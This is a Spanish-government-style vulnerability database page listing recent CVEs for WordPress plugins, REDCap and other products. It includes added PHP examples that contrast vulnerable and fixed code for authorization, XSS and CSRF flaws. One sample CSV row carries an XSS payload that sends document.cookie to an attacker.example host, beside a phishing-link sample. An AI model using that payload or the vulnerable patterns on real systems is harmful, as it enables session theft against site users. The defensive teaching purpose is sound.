Vulnerabilities

To inform, warn and help professionals about the latest security vulnerabilities in technology systems, we have made a database available, in Spanish, for users interested in this information. It includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 records, is based on the information in the NVD (National Vulnerability Database), which INCIBE translates into Spanish under a partnership agreement.

Occasionally this list shows vulnerabilities that have not yet been translated, because entries are added while the INCIBE team is still carrying out the translation. The CVE (Common Vulnerabilities and Exposures) standard for information security vulnerability names is used so that information can be exchanged between different tools and databases.

Every vulnerability collected is linked to its information sources and to the patches or solutions made available by manufacturers and developers. Advanced searches are possible: results can be narrowed down by criteria such as vulnerability type, manufacturer and impact level, among others.

RSS feeds and newsletters provide daily notification of the latest vulnerabilities added to the repository. Below is a list, updated daily, of the latest vulnerabilities.

CVE-2024-12204

Publication date:
11/01/2025
The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in the class-cx-rest.php file in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create 100% off coupons, delete posts, delete leads, and update coupon statuses.
Severity CVSS v4.0: Pending analysis
Last modification:
11/01/2025
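
The flaw class above (a REST endpoint that only checks that the caller is logged in, never what they are allowed to do) is easiest to see side by side with its fix. The following is an added illustration written for this page, not code from the Coupon X plugin: a hypothetical `example-coupons/v1` namespace with a coupon-creation route, registered first with authentication only and then with a real capability check. The `manage_woocommerce` capability, the `shop_coupon` post type and the `discount_type` / `coupon_amount` meta keys are WooCommerce's; everything else is made up for the example.

```php
<?php
// Added illustration, not the plugin's code: a hypothetical REST route that
// creates a percentage coupon, registered without and then with a capability check.
add_action( 'rest_api_init', function () {

    // Vulnerable pattern: the route only checks authentication. A Subscriber is
    // "logged in" too, so any registered user can create a 100% coupon. Leaving
    // permission_callback out entirely is worse still: WordPress (5.5+) logs a
    // _doing_it_wrong() notice but serves the route as public.
    register_rest_route( 'example-coupons/v1', '/coupons', array(
        'methods'             => 'POST',
        'callback'            => 'example_create_coupon',
        'permission_callback' => 'is_user_logged_in',
    ) );

    // Hardened pattern: permission_callback runs before the callback and checks
    // authorization (a capability), not just authentication. The args block makes
    // WordPress sanitize and validate the input before the callback sees it.
    register_rest_route( 'example-coupons/v1', '/coupons-secure', array(
        'methods'             => 'POST',
        'callback'            => 'example_create_coupon',
        'permission_callback' => function ( WP_REST_Request $request ) {
            if ( ! current_user_can( 'manage_woocommerce' ) ) {
                return new WP_Error(
                    'rest_forbidden',
                    __( 'You are not allowed to create coupons.', 'example-coupons' ),
                    array( 'status' => rest_authorization_required_code() ) // 401 or 403
                );
            }
            return true;
        },
        'args' => array(
            'code'   => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_text_field',
            ),
            'amount' => array(
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && $value >= 0 && $value <= 100;
                },
            ),
        ),
    ) );
} );

// Shared callback: the privileged work. Nothing in here decides who may call it,
// which is exactly why the decision has to live in permission_callback.
function example_create_coupon( WP_REST_Request $request ) {
    $post_id = wp_insert_post( array(
        'post_type'   => 'shop_coupon',
        'post_status' => 'publish',
        'post_title'  => $request->get_param( 'code' ),
    ), true );
    if ( is_wp_error( $post_id ) ) {
        return $post_id;
    }
    update_post_meta( $post_id, 'discount_type', 'percent' );
    update_post_meta( $post_id, 'coupon_amount', (float) $request->get_param( 'amount' ) );
    return rest_ensure_response( array( 'id' => $post_id ) );
}
```

To check a plugin for this class of bug, grep its `register_rest_route()` calls for `permission_callback` values of `__return_true`, `is_user_logged_in` or a missing key, then confirm with a Subscriber account: a POST to the first route above succeeds, while the second answers `rest_forbidden` with HTTP 403.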

CVE-2024-11327

Publication date:
11/01/2025
The ClickWhale – Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Severity CVSS v4.0: Pending analysis
Last modification:
05/06/2025
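
The `add_query_arg()` / `remove_query_arg()` pattern named above recurs across WordPress plugins, so it is worth showing the vulnerable and the escaped form together. This is an added illustration for this page, not code from the ClickWhale plugin: hypothetical pagination and "clear filters" links with invented function names, built on the real WordPress functions.

```php
<?php
// Added illustration, not the plugin's code. When no URL is passed,
// add_query_arg() and remove_query_arg() start from $_SERVER['REQUEST_URI'],
// which the requester controls, and neither function escapes its output.

// Vulnerable: the return value goes straight into an attribute. A request such as
//   /wp-admin/admin.php?page=links&x="><script>alert(1)</script>
// comes back with the quote intact, the href attribute is closed early and the
// injected element is rendered for whoever followed the link.
function example_next_page_link_vulnerable( $current_page ) {
    $url = add_query_arg( 'paged', $current_page + 1 );
    return '<a href="' . $url . '">' . __( 'Next', 'example' ) . '</a>';
}

// Fixed: esc_url() strips characters that are not valid in a URL (" < > among
// them), entity-encodes & and ' for HTML, and rejects disallowed schemes such
// as javascript:, so the injected markup arrives as inert text.
function example_next_page_link( $current_page ) {
    $url = add_query_arg( 'paged', (int) $current_page + 1 );
    return '<a href="' . esc_url( $url ) . '">' . esc_html__( 'Next', 'example' ) . '</a>';
}

// remove_query_arg() has the same property and needs the same treatment.
function example_clear_filters_link() {
    $url = remove_query_arg( array( 'paged', 's', 'status' ) );
    return '<a href="' . esc_url( $url ) . '">' . esc_html__( 'Clear filters', 'example' ) . '</a>';
}

// Escape for the context the value lands in: esc_url() for HTML attributes,
// esc_url_raw() when the value feeds wp_redirect() or a header, and
// wp_json_encode() or esc_js() when it is embedded in inline JavaScript.
```

A quick audit is to grep for `add_query_arg(` and `remove_query_arg(` and inspect every hit that is echoed or concatenated into HTML without `esc_url()` around it; the page in the advisory is reachable without logging in, which is why the issue is rated as exploitable by unauthenticated attackers who can get a victim to click.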

CVE-2025-23113

Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. It has an action=myprojects&logout=1 CSRF issue in the alert-title while performing an upload of a CSV file containing a list of alert configurations. An attacker can send the victim a CSV file containing an HTML injection payload in the alert-title. Once the victim uploads the file, they automatically land on a page to view the uploaded data. If the victim clicks on the alert-title value, it can trigger a logout request that terminates their session, or redirect them to a phishing website. This vulnerability stems from the absence of CSRF protections on the logout functionality.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025
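
The root cause named in the last sentence above, a logout reachable through a plain GET link with no token, is a general web-application pattern rather than anything specific to REDCap. The following is an added illustration in plain PHP written for this page; it is not REDCap code, and the paths (`/logout.php`, `/login.php`), the `csrf_token` field and the function names are invented for the example.

```php
<?php
// Added illustration, not REDCap code: a hypothetical logout handler, first as
// a GET-triggered state change and then as a POST that carries a CSRF token.
session_start();

// Vulnerable: any link can end the session. Combined with HTML injection in a
// page the victim views, <a href="/app.php?action=logout">...</a> is enough.
function logout_vulnerable(): void {
    if ( isset( $_GET['action'] ) && $_GET['action'] === 'logout' ) {
        session_destroy();
        header( 'Location: /login.php' );
        exit;
    }
}

// One random token per session, created on first use and stored server-side.
function csrf_token(): string {
    if ( empty( $_SESSION['csrf_token'] ) ) {
        $_SESSION['csrf_token'] = bin2hex( random_bytes( 32 ) );
    }
    return $_SESSION['csrf_token'];
}

// Protected: logout is a state change, so it is POST-only and the submitted token
// must match the session's. A link cannot send a POST body, and a page on another
// origin cannot read the token, so a forged request fails the comparison.
function logout_protected(): void {
    if ( $_SERVER['REQUEST_METHOD'] !== 'POST' ) {
        http_response_code( 405 );
        header( 'Allow: POST' );
        exit;
    }
    $sent = $_POST['csrf_token'] ?? '';
    // hash_equals() is a constant-time comparison; it also tolerates a missing token.
    if ( ! isset( $_SESSION['csrf_token'] ) || ! hash_equals( $_SESSION['csrf_token'], $sent ) ) {
        http_response_code( 403 );
        exit( 'Invalid CSRF token' );
    }
    $_SESSION = array();
    session_destroy();
    header( 'Location: /login.php' );
    exit;
}

// The logout control in the UI becomes a form rather than a link.
function logout_button(): string {
    return '<form method="post" action="/logout.php">'
         . '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars( csrf_token(), ENT_QUOTES, 'UTF-8' ) . '">'
         . '<button type="submit">Log out</button></form>';
}

// Second layer (PHP 7.3+, call before session_start()): a SameSite session cookie
// keeps the browser from attaching the session to a cross-site POST at all.
// session_set_cookie_params( array( 'samesite' => 'Lax', 'secure' => true, 'httponly' => true ) );
```

Forced logout is low impact on its own; the reason to fix it is that the same missing check on any other state-changing action (deleting a project, changing an e-mail address) would be exploitable the same way.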

CVE-2024-9188

Publication date:
10/01/2025
Specially constructed queries cause cross platform scripting leaking administrator tokens
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2025-23110

Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. A reflected cross-site scripting (XSS) vulnerability in the email-subject field exists while performing an upload of a CSV file containing a list of alert configurations. An attacker can send the victim a CSV file containing the XSS payload in the email-subject. Once the victim uploads the file, they automatically land on a page to view the uploaded data. If the victim clicks on the email-subject value, it triggers the XSS payload.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025

CVE-2025-23111

Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. It allows HTML Injection via the Survey field name, exposing users to a redirection to a phishing website. An attacker can exploit this to trick the user that receives the survey into clicking on the field name, which redirects them to a phishing website. Thus, this allows malicious actions to be executed without user consent.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025

CVE-2025-23112

Publication date:
10/01/2025
An issue was discovered in REDCap 14.9.6. A stored cross-site scripting (XSS) vulnerability allows authenticated users to inject malicious scripts into the Survey field name. When a user receives the survey, if they click on the field name, it triggers the XSS payload.
Severity CVSS v4.0: Pending analysis
Last modification:
25/02/2025
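
The three REDCap entries above (CVE-2025-23110, CVE-2025-23111 and CVE-2025-23112) share one mechanism: a value supplied by a user, whether an e-mail subject from an uploaded CSV or a survey field name, is written back into a page as markup. The following is an added illustration written for this page, not REDCap code: a constructed CSV row with attacker-style values, a rendering function that concatenates them raw, and the escaped version with a validation check. The `e()` helper, the column names and the sample hostnames are inventions for the example.

```php
<?php
// Added illustration, not REDCap code: rendering user-supplied CSV values into
// a review page, first unescaped and then escaped per output context.

// Constructed sample row, shaped the way an attacker would fill in the CSV.
$row = array(
    'field_name'    => '<a href="https://phish.example/login">Click to continue</a>',
    'email_subject' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
);

// Vulnerable: raw concatenation. The browser parses the attacker's strings as
// markup: the first becomes a real link to the phishing site (the HTML
// injection case), the second runs JavaScript as soon as the page loads.
function render_row_vulnerable( array $row ): string {
    return '<td>' . $row['field_name'] . '</td><td>' . $row['email_subject'] . '</td>';
}

// Escape at the point of output. ENT_QUOTES covers both quote styles, so the same
// helper is safe inside single- and double-quoted attributes; ENT_SUBSTITUTE keeps
// htmlspecialchars() from returning '' (and silently dropping content) on invalid UTF-8.
function e( string $s ): string {
    return htmlspecialchars( $s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8' );
}

// Fixed: the same values appear as text and as an attribute value, both escaped.
// The value is never placed in an href, so it cannot become a redirect.
function render_row( array $row ): string {
    return '<td>' . e( $row['field_name'] ) . '</td>'
         . '<td title="' . e( $row['email_subject'] ) . '">' . e( $row['email_subject'] ) . '</td>';
}

// Validation is a second layer, not a replacement for escaping: a field name has
// a known shape, so reject rows that do not fit it before they are stored at all.
function valid_field_name( string $name ): bool {
    return (bool) preg_match( '/\A[A-Za-z][A-Za-z0-9_]{0,99}\z/', $name );
}

foreach ( array( 'field_name' ) as $column ) {
    if ( ! valid_field_name( $row[ $column ] ) ) {
        // Report the rejected row to the uploader instead of storing it.
        http_response_code( 400 );
        exit( 'Row rejected: invalid ' . e( $column ) );
    }
}
echo render_row( $row );
```

Stored and reflected variants differ only in where the value sits between injection and rendering; the fix is identical, which is why a project-wide escaping helper applied at every output point closes all three advisories in one pass.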

CVE-2024-9134

Publication date:
10/01/2025
Multiple SQL Injection vulnerabilities exist in the reporting application. A user with advanced report application access rights can exploit the SQL injection, allowing them to execute commands on the underlying operating system with elevated privileges.
Severity CVSS v4.0: Pending analysis
Last modification:
18/12/2025

CVE-2024-47518

Publication date:
10/01/2025
Specially constructed queries targeting ETM could discover active remote access sessions
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2024-47519

Publication date:
10/01/2025
Backup uploads to ETM subject to man-in-the-middle interception
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2024-47520

Publication date:
10/01/2025
A user with advanced report application access rights can perform actions for which they are not authorized
Severity CVSS v4.0: Pending analysis
Last modification:
29/09/2025

CVE-2024-7142

Publication date:
10/01/2025
On Arista CloudVision Appliance (CVA) affected releases running on appliances that support hardware disk encryption (DCA-350E-CV only), the disk encryption might not be successfully performed. This results in the disks remaining unsecured and data on them
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2025